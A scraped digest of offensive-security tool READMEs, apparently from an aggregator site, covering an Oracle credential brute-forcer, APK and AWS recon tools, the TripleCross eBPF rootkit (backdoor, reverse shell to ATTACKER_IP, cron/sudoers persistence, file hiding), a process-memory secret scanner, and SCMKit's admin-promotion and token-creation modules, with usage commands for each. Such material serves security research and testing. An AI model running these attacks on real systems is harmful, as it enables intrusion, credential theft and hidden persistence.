Simple port of the popular Oracle Database Attack Tool (ODAT) (https://github.com/quentinhardy/odat) to C# .Net Framework. Credit to https://github.com/quentinhardy/odat as lots of the functionality are ported from his code.

  • Perform password based attacks e.g. username as password, username list against given password, password list against given username, username:pass combolist.
  • Test if a credential/connection string is working against target
  • Brute force attacks to discover valid SID/ServiceNames
  • Perform discovery of valid TNS listeners against provided target file or CIDR range
  • More to come, I hope!


I take not responsibility for your use of the software. Development is done in my personal capacity and carry no affiliation to my work.


The general command line arguments required are as follow:

-server:XXX.XXX.XXX.XXX -port:1520
-sid:AS OR -srv:AS
-user:Peter -pass:Password

To test if a specific credential set works.

wodat.exe TEST -server:XXX.XXX.XXX.XXX -port:1521 -sid:XE -user:peter -pass:pan

See the outline on modules for further usage. The tool will always first check if the TNS listener that is targeted works.



Module performs wordlist SID guessing attack if not successful will ask for brute force attack.

wodat.exe BRUTESID -server:XXX.XXX.XXX.XXX -port:1521


Module performs wordlist ServiceName guessing attack if not successful will ask for brute force attack.

wodat.exe BRUTESRV -server:XXX.XXX.XXX.XXX -port:1521


Module performs wordlist password based attack. The following options exist:

A - username:password combolist with no credentials given during arguments
B - username list with password given in arguments
C - password list with username given in arguments
D - username as password with username list provided

To perform a basic attack with a given file that has username:password combos.

wodat.exe BRUTECRED -server:XXX.XXX.XXX.XXX -port:1521 -sid:XE


Module tests if the given connection string can connect successfully.

wodat.exe TEST -server:XXX.XXX.XXX.XXX -port:1521 -sid:XE -user:peter -pass:pan


Module will perform discovery against provided CIDR range or file with instances. Note, only instances with valid TNS listeners will be returned. Testing a network range will be much faster as it’s processed in parallel.

wodat.exe DISC

Instances to test must be formatted as per the below example targets.txt:,1521


Not implemented yet.


Not implemented yet.

Setup and Requirements

You can grab automated release build from the GitHub Actions or build yourself using the following commands:

nuget restore wodat.sln
msbuild wodat.sln -t:rebuild -property:Configuration=Release

Some general notes: The Oracle.ManagedDataAccess.dll library will have to be copied with the binary. I'm looking at ways of embedding it.


  • Handle SYSDBA and SYSOPER connections
  • Implement outstanding modules
  • Various validation, error handling code still needs to be done
  • Some minor known bugfixes
  • Add options to check against built in lists for SID, ServiceNames or common credentials

Slicer - Tool To Automate The Boring Process Of APK Recon

By: Zion3R
18 November 2022 at 11:30

A tool to automate the recon process on an APK file.

Slicer accepts a path to an extracted APK file and then returns all the activities, receivers, and services which are exported and have null permissions and can be externally provoked.

Note: The APK has to be extracted via jadx or apktool.



I started bug bounty like 3 weeks ago(in June 2020) and I have been trying my best on android apps. But I noticed one thing that in all the apps there were certain things which I have to do before diving in deep. So I just thought it would be nice to automate that process with a simple tool.

Why not drozer?

Well, drozer is a different beast. Even though it does finds out all the accessible components but I was tired of running those commands again and again.

Why not automate using drozer?

I actually wrote a bash script for running certain drozer commands so I won't have to run them manually but there was still some boring stuff that had to be done. Like Checking the strings.xml for various API keys, testing if firebase DB was publically accessible or if those google API keys have setup any cap or anything on their usage and lot of other stuff.

Why not search all the files?

I think that a tool like grep or ripgrep would be much faster to search through all the files. So if there is something specific that you want to search it would be better to use those tools. But if you think that there is something which should be checked in all the android files then feel free to open an issue.


  • Check if the APK has set the android:allowbackup to true

  • Check if the APK has set the android:debuggable to true.

  • Return all the activities, services and broadcast receivers which are exported and have null permission set. This is decided on the basis of two things:

    • android:exporte=true is present in any of the component and have no permission set.
    • If exported is not mention then slicer check if any Intent-filters are defined for that component, if yes that means that component is exported by default(This is the rule given in android documentation.)
  • Check the Firebase URL of the APK by testing it for .json trick.

    • If the firebase URL is myapp.firebaseio.com then it will check if https://myapp.firebaseio.com/.json returns something or gives permission denied.
    • If this thing is open then that can be reported as high severity.
  • Check if the google API keys are publically accessible or not.

    • This can be reported on some bounty programs but have a low severity.
    • But most of the time reporting this kind of thing will bring out the pain of Duplicate.
    • Also sometimes the company can just close it as not applicable and will claim that the KEY has a usage cap - r/suspiciouslyspecific
  • Return other API keys that are present in strings.xml and in AndroidManifest.xml

  • List all the file names present in /res/raw and res/xml directory.

  • Extracts all the URLs and paths.

    • These can be used with tool like dirsearch or ffuf.


  • Clone this repository
git clone https://github.com/mzfr/slicer
  • cd slicer
  • Now you can run it: python3 slicer.py -h


It's very simple to use. Following options are available:

Extract information from Manifest and strings of an APK

slicer [OPTION] [Extracted APK directory]


-d, --dir path to jadx output directory
-o, --output Name of the output file(not implemented)

I have not implemented the output flag yet because I think if you can redirect slicer output to a yaml file it will a proper format.

Usage Example

  • Extract information from the APK and display it on the screen.
python3 slicer.py -d path/to/extact/apk -c config.json

Acknowledgements and Credits

The extractor module used to extract URLs and paths is taken from apkurlgrep by @ndelphit


All the features implemented in this are things that I've learned in past few weeks, so if you think that there are various other things which should be checked in an APK then please open an issue for that feature and I'd be happy to implement that :)


If you'd like you can buy me some coffee:

nuvola - Tool To Dump And Perform Automatic And Manual Security Analysis On Aws Environments Configurations And Services

By: Zion3R
17 November 2022 at 11:30

nuvola (with the lowercase n) is a tool to dump and perform automatic and manual security analysis on AWS environments configurations and services using predefined, extensible and custom rules created using a simple Yaml syntax.

The general idea behind this project is to create an abstracted digital twin of a cloud platform. For a more concrete example: nuvola reflects the BloodHound traits used for Active Directory analysis but on cloud environments (at the moment only AWS).

The usage of a graph database also increases the possibility of finding different and innovative attack paths and can be used as an offline, centralised and lightweight digital twin.

Quick Start


  • docker-compose installed
  • an AWS account configured to be used with awscli with full access to the cloud resources, better if in ReadOnly mode (the policy arn:aws:iam::aws:policy/ReadOnlyAccess is fine)


  1. Clone the repository
git clone --depth=1 https://github.com/primait/nuvola.git; cd nuvola
  1. Create and edit, if required, the .env file to set your DB username/password/URL
cp .env_example .env;
  1. Start the Neo4j docker instance
make start
  1. Build the tool
make build


  1. Firstly you need to dump all the supported AWS services configurations and load the data into the Neo4j database:
./nuvola dump -profile default_RO -outputdir ~/DumpDumpFolder -format zip
  1. To import a previously executed dump operation into the Neo4j database:
./nuvola assess -import ~/DumpDumpFolder/nuvola-default_RO_20220901.zip
  1. To only perform static assessments on the data loaded into the Neo4j database using the predefined ruleset:
./nuvola assess
  1. Or use Neo4j Browser to manually explore the digital twin.

About nuvola

To get started with nuvola and its database schema, check out the nuvola Wiki.

No data is sent or shared with Prima Assicurazioni.

How to contribute

  • reporting bugs and issues
  • reporting new improvements
  • reviewing issues and pull requests
  • fixing bugs and issues
  • creating new rules
  • improving the overall quality



nuvola uses graph theory to reveal possible attack paths and security misconfigurations on cloud environments.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this repository and program. If not, see http://www.gnu.org/licenses/.

TripleCross - A Linux eBPF Rootkit With A Backdoor, C2, Library Injection, Execution Hijacking, Persistence And Stealth Capabilities.

By: Zion3R
16 November 2022 at 11:30

TripleCross is a Linux eBPF rootkit that demonstrates the offensive capabilities of the eBPF technology.

TripleCross is inspired by previous implant designs in this area, notably the works of Jeff Dileo at DEFCON 271, Pat Hogan at DEFCON 292, Guillaume Fournier and Sylvain Afchain also at DEFCON 293, and Kris NΓ³va's Boopkit4. We reuse and extend some of the techniques pioneered by these previous explorations of the offensive capabilities of eBPF technology.

This rootkit was created for my Bachelor's Thesis at UC3M. More details about its design are provided in the thesis document.


This rookit is purely for educational and academic purposes. The software is provided "as is" and the authors are not responsible for any damage or mishaps that may occur during its use.

Do not attempt to use TripleCross to violate the law. Misuse of the provided software and information may result in criminal charges.


  1. A library injection module to execute malicious code by writing at a process' virtual memory.
  2. An execution hijacking module that modifies data passed to the kernel to execute malicious programs.
  3. A local privilege escalation module that allows for running malicious programs with root privileges.
  4. A backdoor with C2 capabilities that can monitor the network and execute commands sent from a remote rootkit client. It incorporates multiple activation triggers so that these actions are transmitted stealthily.
  5. A rootkit client that allows an attacker to establish 3 different types of shell-like connections to send commands and actions that control the rootkit state remotely.
  6. A persistence module that ensures the rootkit remains installed maintaining full privileges even after a reboot event.
  7. A stealth module that hides rootkit-related files and directories from the user.

TripleCross overview

The following figure shows the architecture of TripleCross and its modules.

The raw sockets library RawTCP_Lib used for rootkit transmissions is of my authorship and has its own repository.

The following table describes the main source code files and directories to ease its navigation:

docs Original thesis document
src/client Source code of the rootkit client
src/client/lib RawTCP_Lib shared library
src/common Constants and configuration for the rootkit. It also includes the implementation of elements common to the eBPF and user space side of the rootkit, such as the ring buffer
src/ebpf Source code of the eBPF programs used by the rootkit
src/helpers Includes programs for testing the functionality of several rootkit modules, and also the malicious program and library used at the execution hijacking and library injection modules, respectively
src/libbpf Contains the libbpf library integrated with the rootkit
src/user Source code of the userland programs used by the rootkits
src/vmlinux Headers containing the definition of kernel data structures (this is the recommended method when using libbpf)

Build and Install


This research project has been tested under the following environments:

VERSION Ubuntu 21.04 5.11.0 10.3.0 12.0.0 2.33

We recommend using Ubuntu 21.04, which by default will incorporate the software versions shown here. Otherwise, some of the problems you may run into are described here.


The rootkit source code is compiled using two Makefiles.

# Build rootkit
cd src
make all
# Build rootkit client
cd client

The following table describes the purpose of each Makefile in detail:

src/client/Makefile make Compilation of the rootkit client src/client/injector
src/Makefile make help Compilation of programs for testing rootkit capabilities, and the malicious program and library of the execution hijacking and library injection modules, respectively src/helpers/simple_timer, src/helpers/simple_open, src/helpers/simple_execve, src/helpers/lib_injection.so, src/helpers/execve_hijack
src/Makefile make kit Compilation of the rootkit using the libbpf library src/bin/kit
src/Makefile make tckit Compilation of the rootkit TC egress program src/bin/tc.o


Once the rootkit files are generated under src/bin/, the tc.o and kit programs must be loaded in order. In the following example, the rootkit backdoor will operate in the network interface enp0s3:

// TC egress program
sudo tc qdisc add dev enp0s3 clsact
sudo tc filter add dev enp0s3 egress bpf direct-action obj bin/tc.o sec classifier/egress
// Libbpf-powered rootkit
sudo ./bin/kit -t enp0s3

Attack scenario scripts

There are two scripts, packager.sh and deployer.sh, that compile and install the rootkit automatically, just as an attacker would do in a real attack scenario.

  • Executing packager.sh will generate all rootkit files under the apps/ directory.

  • Executing deployer.sh will install the rootkit and create the persistence files.

These scripts must first be configured with the following parameters for the proper functioning of the persistence module:

src/helpers/deployer.sh CRON_PERSIST Cron job to execute after reboot
src/helpers/deployer.sh SUDO_PERSIST Sudo entry to grant password-less privileges

Library injection module

The rootkit can hijack the execution of processes that call the sys_timerfd_settime or sys_openat system calls. This is achieved by overwriting the Global Offset Table (GOT) section at the virtual memory of the process making the call. This leads to a malicious library (src/helpers/injection_lib.c) being executed. The library will spawn a reverse shell to the attacker machine, and then returns the flow of execution to the original function without crashing the process.

TripleCross is prepared to bypass common ELF hardening techniques, including:

  • ASLR
  • Stack canaries
  • DEP/NX
  • PIE
  • Full RELRO

It is also prepared to work with Intel CET-compatible code.

The module functionality can be checked using two test programs src/helpers/simple_timer.c and src/helpers/simple_open.c. Alternatively you may attempt to hijack any system process (tested and working with systemd).

The module configuration is set via the following constants:

src/common/constants.h TASK_COMM_NAME_INJECTION_
Name of the process to hijack at syscall sys_timerfd_settime
src/common/constants.h TASK_COMM_NAME_INJECTION_
Name of the process to hijack at syscall sys_openat
src/helpers/injection_lib.c ATTACKER_IP & ATTACKER_PORT IP address and port of the attacker machine

Receiving a reverse shell from the attacker machine can be done with netcat:

nc -nlvp <ATTACKER_PORT>

Library injection via GOT hijacking technique

The technique incorporated in TripleCross consists of 5 stages:

Locating GOT and the return address

The rootkit hooks the system call using a tracepoint program. From there, it locates the address at the GOT section which the PLT stub used to make the call to the glibc function responsible of the syscall.

In order to reach the GOT section, the eBPF program uses the return address stored at the stack. Note that:

  • The .text makes a call to the .plt, so rip is saved as ret in the stack.
  • The .plt makes a jump to glibc using .got, so no other rip is saved. It also does not modify or save the value of rbp.
  • Glibc makes a syscall, which does not save rip in the stack, but rather saves it in rcx.

Therefore in order to check from eBPF that an address in the stack is the return address that will lead us to the correct GOT, we must check that it is the return address of the PLT stub that uses the GOT address that jumps to the glibc function making the system call we hooked from eBPF.

Two techniques for finding the return address have been incorporated:

  • With sys_timerfd_settime, the eBPF program scans forward in the scan using the syscall arguments.
  • With sys_openat, the eBPF program scans uses the data at tracepoints' pt_regs struct for scanning the return address.

Locating key functions for shellcode

The shellcode must be generated dynamically to bypass ASLR and PIE, which change the address of functions such as dlopen() on each program execution.

Injecting shellcode in a code cave

A code cave can be found by reverse engineering an ELF if ASLR and PIE are off, but usually that is not the case. The eBPF program issues a request to an user space rootkit program that uses the /proc filesystem to locate and write into a code cave at the .text (executable) section.

Overwriting the GOT section

Depending on whether Partial or Full RELRO are active on the executable, the eBPF program overwrites the GOT section directly or with the /proc filesystem.

Waiting for the next system call

When the next syscall is issued in the hijacked program, the PLT section uses the modified GOT section, hijacking the flow of execution which gets redirected to the shellcode at the code cave. The shellcode is prepared to keep the program from crashing, and calls the malicious library (src/helpers/lib_injection.so). This library issues a fork() and spawns a reverse shell with the attacker machine. Afterwards the flow of execution is restored.

Backdoor and C2

The backdoor works out of the box without any configuration needed. The backdoor can be controlled remotely using the rootkit client program:

./injector -c <Victim IP> Spawns a plaintext pseudo-shell by using the execution hijacking module
./injector -e <Victim IP> Spawns an encrypted pseudo-shell by commanding the backdoor with a pattern-based trigger
./injector -s <Victim IP> Spawns an encrypted pseudo-shell by commanding the backdoor with a multi-packet trigger (of both types)
./injector -p <Victim IP> Spawns a phantom shell by commanding the backdoor with a pattern-based trigger
./injector -a <Victim IP> Orders the rootkit to activate all eBPF programs
./injector -u <Victim IP> Orders the rootkit to detach all of its eBPF programs
./injector -S <Victim IP> Showcases how the backdoor can hide a message from the kernel (Simple PoC)
./injector -h Displays help

Backdoor triggers

Actions are sent to the backdoor using backdoor triggers, which indicate the backdoor the action to execute depending on the value of the attribute K3:

0x1F29 Request to start an encrypted pseudo-shell connection
0x4E14 Request to start a phantom shell connection
0x1D25 Request to load and attach all rootkit eBPF programs
0x1D24 Request to detach all rootkit eBPF programs (except the backdoor’s)

Pattern-based trigger

This trigger hides the command and client information so that it can be recognized by the backdoor, but at the same time seems random enough for an external network supervisor. It is based on the trigger used by the recently discovered NSA rootkit Bvp47.

Multi-packet trigger

This trigger consists of multiple TCP packets on which the backdoor payload is hidden in the packet headers. This design is based on the CIA Hive implant described in the Vault 7 leak. The following payload is used:

A rolling XOR is then computed over the above payload and it is divided into multiple parts, depending on the mode selected by the rootkit client. TripleCross supports payloads hidden on the TCP sequence number:

And on the TCP source port:

Backdoor pseudo-shells

The client can establish rootkit pseudo-shells, a special rootkit-to-rootkit client connection which simulates a shell program, enabling the attacker to execute Linux commands remotely and get the results as if it was executing them directly in the infected machine. Multiple pseudo-shells are incorporated in our rootkit:

Plaintext pseudo-shell

This shell is generated after a successful run of the execution hijacking module, which will execute a malicious file that establishes a connection with the rootkit client as follows:

Encrypted pseudo-shell

An encrypted pseudo-shell can be requested by the rootkit client at any time, consisting of a TLS connection between the rootkit and the rootkit client. Inside the encrypted connection, a transmission protocol is followed to communicate commands and information, similar to that in plaintext pseudo-shells.

Spawning an encrypted pseudo-shell requires the backdoor to listen for triggers, which accepts either pattern-based triggers or both types of multi-packet trigger:

Phantom shell

A phantom shell uses a combination of XDP and TC programs to overcome eBPF limitations at the network, specifically that it cannot generate new packets. For this, the backdoor modifies existing traffic, overwriting the payload with the data of the C2 transmission. The original packets are not lost since TCP retransmissions send the original packet (without modifications) again after a short time.

The following protocol illustrates the traffic during the execution of a command using a phantom shell:

A phantom shell is requested by the rootkit client which issues a command to be executed by the backdoor:

After the infected machine sends any TCP packet, the backdoor overwrites it and the client shows the response:

Execution hijacking module

In principle, an eBPF program cannot start the execution of a program by itself. This module shows how a malicious rootkit may take advantage of benign programs in order to execute malicious code at the user space. This module achieves two goals:

  • Execute a malicious user program taking advantage of other program's execution.
  • Be transparent to the user space, that is, if we hijack the execution of a program so that another is run, the original program should be executed too with the least delay.

This module works by hijacking the sys_execve() syscall, modifying its arguments so that a malicious program (src/helpers/execve_hijack.c) is run instead. This modification is made in such a way that the malicious program can then execute the original program with the original arguments to avoid raising concerns in the user space. The following diagram summarizes the overall functionality:

The arguments of the original sys_execve() call are modified in such a way that the original arguments are not lost (using argv[0]) so that the original program can be executed after the malicious one:

We have incorporated a sample test program (src/helpers/simple_execve.c) for testing the execution hijacking module. The module can also hijack any call in the system, depending on the configuration:

src/common/constants.h PATH_EXECUTION_HIJACK_PROGRAM Location of the malicious program to be executed upon succeeding to execute a sys_execve call
src/common/constants.h EXEC_HIJACK_ACTIVE Deactivate (0) or activate (1) the execution hijacking module
src/common/constants.h TASK_COMM_RESTRICT_HIJACK_ACTIVE Hijack any sys_execve call (0) or only those indicated in TASK_COMM_NAME_RESTRICT_HIJACK (1)
src/common/constants.h TASK_COMM_NAME_RESTRICT_HIJACK Name of the program from which to hijack sys_execve calls

After a successful hijack, the module will stop itself. The malicious program execve_hijack will listen for requests of a plaintext pseudo-shell from the rootkit client.

Rootkit persistence

After the infected machine is rebooted, all eBPF programs will be unloaded from the kernel and the userland rootkit program will be killed. Moreover, even if the rootkit could be run again automatically, it would no longer enjoy the root privileges needed for attaching the eBPF programs again. The rootkit persistence module aims to tackle these two challenges:

  • Execute the rootkit automatically and without user interaction after a machine reboot event.
  • Once the rootkit has acquired root privileges the first time it is executed in the machine, it must keep them even after a reboot.

TripleCross uses two secret files, created under cron.d and sudoers.d, to implement this functionality. These entries ensure that the rootkit is loaded automatically and with full privilege after a reboot. These files are created and managed by the deployer.sh script:

The script contains two constants that must be configured for the user to infect on the target system:

src/helpers/deployer.sh CRON_PERSIST Cron job to execute after reboot
src/helpers/deployer.sh SUDO_PERSIST Sudo entry to grant password-less privileges

Rootkit stealth

The persistence module is based on creating additional files, but they may get eventually found by the system owner or by some software tool, so there exists a risk on leaving them in the system. Additionally, the rootkit files will need to be stored at some location, in which they may get discovered.

Taking the above into account, the stealth module provides the following functionality:

  • Hide a directory completely from the user (so that we can hide all rootkit files inside).
  • Hide specific files in a directory (we need to hide the persistence files, but we cannot hide the sudoers.d or cron.d directories completely, since they belong to the normal system functioning).

The files and directories hidden by the rootkit can be customized by the following configuration constants:

src/common/constants.h SECRET_DIRECTORY_NAME_HIDE Name of directory to hide
src/common/constants.h SECRET_FILE_PERSISTENCE_NAME Name of the file to hide

By default, TripleCross will hide any files called "ebpfbackdoor" and a directory named "SECRETDIR". This module is activated automatically after the rootkit installation.

The technique used for achieving this functionality consists of tampering with the arguments of the sys_getdents() system call:


The TripleCross rootkit and the rootkit client are licensed under the GPLv3 license. See LICENSE.

The RawTCP_Lib library is licensed under the MIT license.

The original thesis document and included figures are released under Creative Commons BY-NC-ND 4.0.


  1. J. Dileo. Evil eBPF: Practical Abuses of an In-Kernel Bytecode Runtime. DEFCON 27. slides

  2. P. Hogan. Warping Reality: Creating and Countering the Next Generation of Linux Rootkits using eBPF. DEFCON 27. presentation

  3. G. Fournier and S. Afchain. eBPF, I thought we were friends! DEFCON 29. slides

  4. Kris NΓ³va. Boopkit. github

Dismember - Scan Memory For Secrets And More

By: Zion3R
15 November 2022 at 11:30

Dismember is a command-line toolkit for Linux that can be used to scan the memory of all processes (or particular ones) for common secrets and custom regular expressions, among other things.

It will eventually become a full /proc toolkit.

Using the grep command, it can match a regular expression across all memory for all (accessible) processes. This could be used to find sensitive data in memory, identify a process by something included in its memory, or to interrogate a processes' memory for interesting information.

There are many built-in patterns included via the scan command, which effectively works as a secret scanner against the memory on your machine.

Dismember can be used to search memory of all processes it has access to, so running it as root is the most effective method.

Commands are also included to list processes, explore process status and related information, draw process trees, and more...

Main Commands

Command Description
grep Search process memory for a given string or regex
scan Search process memory for a set of predefined secret patterns

Utility Commands

Command Description
files Show a list of files being accessed by a process
find Find a PID given a process name. If multiple processes match, the first one is returned.
info Show information about a process
kernel Show information about the kernel
kill Kill a process (or processes) using SIGKILL
list List all processes currently available on the system
resume Resume a suspended process using SIGCONT
suspend Suspend a process using SIGSTOP (use 'dismember resume' to leave suspension)
tree Show a tree diagram of a process and all children (defaults to PID 1).


Grab a binary from the latest release and add it to your path.

Usage Examples

Search for a pattern in a process by PID

# search memory owned by process 1234
dismember grep -p 1234 'the password is .*'

Search for a pattern in a process by name

# search memory owned by processes named "nginx" for a login form submission
dismember grep -n nginx 'username=liamg&password=.*'

Search for a pattern across all processes

# find a github api token across all processes
dismember grep 'gh[pousr]_[0-9a-zA-Z]{36}'

Search for secrets in memory across all processes

# search all accessible memory for common secrets
dismember scan


Isn't this information all just sitting in /proc?

Pretty much. Dismember just reads and presents it for the most part. If you can get away with grep whatever /proc/[pid]/blah then go for it! I built this as an educational experience because I couldn't sleep one night and stayed up late reading the proc man-pages (I live an extremely rock 'n' roll lifestyle). It's not a replacement for existing tools, but perhaps it can complement them.

Do you know how horrific some of these commands seem when read out of context?


Unblob - Extract Files From Any Kind Of Container Formats

By: Zion3R
14 November 2022 at 11:30

unblob is an accurate, fast, and easy-to-use extraction suite. It parses unknown binary blobs for more than 30 different archive, compression, and file-system formats, extracts their content recursively, and carves out unknown chunks that have not been accounted for.

Unblob is free to use, licensed with the MIT license. It has a Command Line Interface and can be used as a Python library.
This turns unblob into the perfect companion for extracting, analyzing, and reverse engineering firmware images.

See more at https://unblob.org.


Extract files from any kind of container formats (1)

SCMKit - Source Code Management Attack Toolkit

By: Zion3R
13 November 2022 at 11:30

Source Code Management Attack Toolkit - SCMKit is a toolkit that can be used to attack SCM systems. SCMKit allows the user to specify the SCM system and attack module to use, along with specifying valid credentials (username/password or API key) to the respective SCM system. Currently, the SCM systems that SCMKit supports are GitHub Enterprise, GitLab Enterprise and Bitbucket Server. The attack modules supported include reconnaissance, privilege escalation and persistence. SCMKit was built in a modular approach, so that new modules and SCM systems can be added in the future by the information security community.


Libraries Used

The below 3rd party libraries are used in this project.

Library URL License
Octokit https://github.com/octokit/octokit.net MIT License
Fody https://github.com/Fody/Fody MIT License
GitLabApiClient https://github.com/nmklotas/GitLabApiClient MIT License
Newtonsoft.Json https://github.com/JamesNK/Newtonsoft.Json MIT License


  • Use the pre-compiled binary in Releases

Building Yourself

Take the below steps to setup Visual Studio in order to compile the project yourself. This requires a .NET library that can be installed from the NuGet package manager.

  • Load the Visual Studio project up and go to "Tools" --> "NuGet Package Manager" --> "Package Manager Settings"
  • Go to "NuGet Package Manager" --> "Package Sources"
  • Add a package source with the URL https://api.nuget.org/v3/index.json
  • Install the below NuGet packages
    • Install-Package Costura.Fody -Version 3.3.3
    • Install-Package Octokit
    • Install-Package GitLabApiClient
    • Install-Package Newtonsoft.Json
  • You can now build the project yourself!



  • -c, -credential - credential for authentication (username:password or apiKey)
  • -s, -system - system to attack (github,gitlab,bitbucket)
  • -u, -url - URL for GitHub Enterprise, GitLab Enterprise or Bitbucket Server
  • -m, -module - module to run
  • -o, -option - options (when applicable)

Systems (-s, -system)

  • github: GitHub Enterprise
  • gitlab: GitLab Enterprise
  • bitbucket: Bitbucket Server

Modules (-m, -module)

  • listrepo: list all repos the current user can see
  • searchrepo: search for a given repo
  • searchcode: search for code containing keyword search term
  • searchfile: search for filename containing keyword search term
  • listsnippet: list all snippets of current user
  • listrunner: list all GitLab runners available to current user
  • listgist: list all gists of current user
  • listorg: list all orgs current user belongs to
  • privs: get privs of current API token
  • addadmin: promote given user to admin role
  • removeadmin: demote given user from admin role
  • createpat: create personal access token for target user
  • listpat: list personal access tokens for a target user
  • removepat: remove personal access token for a target user
  • createsshkey: create SSH key for current user
  • listsshkey: list SSH keys for current user
  • removesshkey: remove SSH key for current user
  • adminstats: get admin stats (users, repos, orgs, gists)
  • protection: get branch protection settings

Module Details Table

The below table shows where each module is supported

Attack Scenario Module Requires Admin? GitHub Enterprise GitLab Enterprise Bitbucket Server
Reconnaissance listrepo No X X X
Reconnaissance searchrepo No X X X
Reconnaissance searchcode No X X X
Reconnaissance searchfile No X X X
Reconnaissance listsnippet No X
Reconnaissance listrunner No X
Reconnaissance listgist No X
Reconnaissance listorg No X
Reconnaissance privs No X X
Reconnaissance protection No X
Persistence listsshkey No X X X
Persistence removesshkey No X X X
Persistence createsshkey No X X X
Persistence listpat No X X
Persistence removepat No X X
Persistence createpat Yes (GitLab Enterprise only) X X
Privilege Escalation addadmin Yes X X X
Privilege Escalation removeadmin Yes X X X
Reconnaissance adminstats Yes X


List Repos

Use Case

Discover repositories being used in a particular SCM system


Provide the listrepo module, along with any relevant authentication information and URL. This will output the repository name and URL.

GitHub Enterprise

This will list all repositories that a user can see.

SCMKit.exe -s github -m listrepo -c userName:password -u https://github.something.local

SCMKit.exe -s github -m listrepo -c apiKey -u https://github.something.local

GitLab Enterprise

This will list all repositories that a user can see.

SCMKit.exe -s gitlab -m listrepo -c userName:password -u https://gitlab.something.local

SCMKit.exe -s gitlab -m listrepo -c apiKey -u https://gitlab.something.local

Bitbucket Server

This will list all repositories that a user can see.

SCMKit.exe -s bitbucket -m listrepo -c userName:password -u https://bitbucket.something.local

SCMKit.exe -s bitbucket -m listrepo -c apiKey -u https://bitbucket.something.local

Example Output

C:\>SCMKit.exe -s gitlab -m listrepo -c username:password -u https://gitlab.hogwarts.local

Module: listrepo
System: gitlab
Auth Type: Username/Password
Target URL: https://gitlab.hogwarts.local

Timestamp: 1/14/2022 8:30:47 PM

Name | Visibility | URL
MaraudersMap | Private | https://gitlab.hogwarts.local/hpotter/maraudersmap
testingStuff | Internal | https://gitlab.hogwarts.local/adumbledore/testingstuff
Spellbook | Internal | https://gitlab.hogwarts.local/hpotter/spellbook findShortestPathToGryffindorSword | Internal | https://gitlab.hogwarts.local/hpotter/findShortestPathToGryffindorSword
charms | Public | https://gitlab.hogwarts.local/hgranger/charms
Secret-Spells | Internal | https://gitlab.hogwarts.local/adumbledore/secret-spells
Monitoring | Internal | https://gitlab.hogwarts.local/gitlab-instance-10590c85/Monitoring

Search Repos

Use Case

Search for repositories by repository name in a particular SCM system


Provide the searchrepo module and your search criteria in the -o command-line switch, along with any relevant authentication information and URL. This will output the matching repository name and URL.

GitHub Enterprise

The GitHub repo search is a "contains" search where the string you enter it will search for repos with names that contain your search term.

SCMKit.exe -s github -m searchrepo -c userName:password -u https://github.something.local -o "some search term"

SCMKit.exe -s github -m searchrepo -c apikey -u https://github.something.local -o "some search term"

GitLab Enterprise

The GitLab repo search is a "contains" search where the string you enter it will search for repos with names that contain your search term.

SCMKit.exe -s gitlab -m searchrepo -c userName:password -u https://gitlab.something.local -o "some search term"

SCMKit.exe -s gitlab -m searchrepo -c apikey -u https://gitlab.something.local -o "some search term"

Bitbucket Server

The Bitbucket repo search is a "starts with" search where the string you enter it will search for repos with names that start with your search term.

SCMKit.exe -s bitbucket -m searchrepo -c userName:password -u https://bitbucket.something.local -o "some search term"

SCMKit.exe -s bitbucket -m searchrepo -c apikey -u https://bitbucket.something.local -o "some search term"

Example Output

Search Code

Use Case

Search for code containing a given keyword in a particular SCM system


Provide the searchcode module and your search criteria in the -o command-line switch, along with any relevant authentication information and URL. This will output the URL to the matching code file, along with the line in the code that matched.

GitHub Enterprise

The GitHub code search is a "contains" search where the string you enter it will search for code that contains your search term in any line.

SCMKit.exe -s github -m searchcode -c userName:password -u https://github.something.local -o "some search term"

SCMKit.exe -s github -m searchcode -c apikey -u https://github.something.local -o "some search term"

GitLab Enterprise

The GitLab code search is a "contains" search where the string you enter it will search for code that contains your search term in any line.

SCMKit.exe -s gitlab -m searchcode -c userName:password -u https://gitlab.something.local -o "some search term"

SCMKit.exe -s gitlab -m searchcode -c apikey -u https://gitlab.something.local -o "some search term"

Bitbucket Server

The Bitbucket code search is a "contains" search where the string you enter it will search for code that contains your search term in any line.

SCMKit.exe -s bitbucket -m searchcode -c userName:password -u https://bitbucket.something.local -o "some search term"

SCMKit.exe -s bitbucket -m searchcode -c apikey -u https://bitbucket.something.local -o "some search term"

Example Output

Search Files

Use Case

Search for files in repositories containing a given keyword in the file name in a particular SCM system


Provide the searchfile module and your search criteria in the -o command-line switch, along with any relevant authentication information and URL. This will output the URL to the matching file in its respective repository.

GitHub Enterprise

The GitLab file search is a "contains" search where the string you enter it will search for files that contains your search term in the file name.

SCMKit.exe -s github -m searchfile -c userName:password -u https://github.something.local -o "some search term"

SCMKit.exe -s github -m searchfile -c apikey -u https://github.something.local -o "some search term"

GitLab Enterprise

The GitLab file search is a "contains" search where the string you enter it will search for files that contains your search term in the file name.

SCMKit.exe -s gitlab -m searchfile -c userName:password -u https://gitlab.something.local -o "some search term"

SCMKit.exe -s gitlab -m searchfile -c apikey -u https://gitlab.something.local -o "some search term"

Bitbucket Server

The Bitbucket file search is a "contains" search where the string you enter it will search for files that contains your search term in the file name.

SCMKit.exe -s bitbucket -m searchfile -c userName:password -u https://bitbucket.something.local -o "some search term"

SCMKit.exe -s bitbucket -m searchfile -c apikey -u https://bitbucket.something.local -o "some search term"

Example Output

C:\source\SCMKit\SCMKit\bin\Release>SCMKit.exe -s bitbucket -m searchfile -c apikey -u http://bitbucket.hogwarts.local:7990 -o jenkinsfile

Module: searchfile
System: bitbucket
Auth Type: API Key
Options: jenkinsfile
Target URL: http://bitbucket.hogwarts.local:7990

Timestamp: 1/14/2022 10:17:59 PM

[>] REPO: http://bitbucket.hogwarts.local:7990/scm/~HPOTTER/hpotter
[>] FILE: Jenkinsfile

[>] REPO: http://bitbucket.hogwarts.local:7990/scm/STUD/cred-decryption
[>] FILE: subDir/Jenkinsfile

Total matching results: 2

List Snippets

Use Case

List snippets owned by the current user in GitLab


Provide the listsnippet module, along with any relevant authentication information and URL.

GitLab Enterprise

SCMKit.exe -s gitlab -m listsnippet -c userName:password -u https://gitlab.something.local

